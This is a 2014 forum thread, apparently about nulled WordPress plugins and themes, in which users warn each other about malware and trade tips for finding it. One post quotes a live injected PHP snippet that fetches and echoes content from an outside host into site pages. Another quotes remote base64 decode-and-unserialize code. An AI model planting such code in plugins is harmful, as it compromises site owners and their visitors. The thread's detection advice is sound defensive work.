Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
04-30-2014, 04:44 PM
Post: #11
|
|||
|
|||
RE:
(04-30-2014 02:12 PM)iapetos Wrote: You are very wrong about using virustotal.com. I commend you for trying to help people stay safe but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time. MAN VIRUS TOTAL IS NOT A END , IT IS JUST FIRST STEP , MORE IMPORTANT STEPS ARE GOING TO BE SHARED SOON |
|||
04-30-2014, 04:46 PM
Post: #12
|
|||
|
|||
RE:
(04-30-2014 01:36 PM)semerkhet22 Wrote: @patelnirpendra, sorry if you did not understand me.OF COURSE I UNDERSTOOD YOU , EVERYONE IS FREE TO SHARE MALWARE CODES , EVEN I AM GOING TO GIVE +5 FOR THEM |
|||
04-30-2014, 04:47 PM
Post: #13
|
|||
|
|||
RE: | |||
06-09-2014, 06:12 PM
Post: #14
|
|||
|
|||
RE:
Hey everyone.
I downloaded a few things from a site called "techerhut.com" and for a while didn't have any problems until I found this malicious code: Code: if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} It redirects to a Justin Bieber video. If you ever downloaded the Easy Social Share Buttons plugin from that site you've got the malware. He's probably adding it to all his plugins. Get File Seek and check your themes and plugins for this malware. |
|||
06-14-2014, 01:00 AM
Post: #15
|
|||
|
|||
RE:
(06-09-2014 06:12 PM)dannyhat Wrote: Hey everyone.TRY TO ATTACHED FILE , INSTEAD OF THIS PIECE OF CODE |
|||
06-14-2014, 06:37 AM
Post: #16
|
|||
|
|||
RE:
According to me, the best way to start with is to check the files included in your theme functions.php or your plugin main file.
You can search for strings like base64, eval or gzinflate as it could contain malicious code. Then go here to attempt to decode the suspicious lines of code: http://ddecode.com/phpdecoder/ |
|||
06-17-2014, 12:44 PM
(This post was last modified: 06-17-2014 12:57 PM by fsnsh6.)
Post: #17
|
|||
|
|||
RE:
one of file function.php line 139 has the base64 decode import, so is it safe for import? or Question:is this theme safe?
http:// bestblackhatforum . com/Thread-GET-ThemeForest-PRO-Business-Responsive-Multi-Purpose-Theme-PURCHASED?page=2 if(get_option('wpb_js_templates',"")==""){ $saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt'); $import_code = base64_decode($saved['body']); update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' ); virustotal scan show 1 tread https://www.virustotal.com/ro/file/ef130.../analysis/ Detection ratio: 1 / 53 conclusion= not safe |
|||
06-17-2014, 02:29 PM
Post: #18
|
|||
|
|||
RE:
(06-17-2014 12:44 PM)fsnsh6 Wrote: one of file function.php line 139 has the base64 decode import, so is it safe for import? or Question:is this theme safe?Thanks for the heads-up! |
|||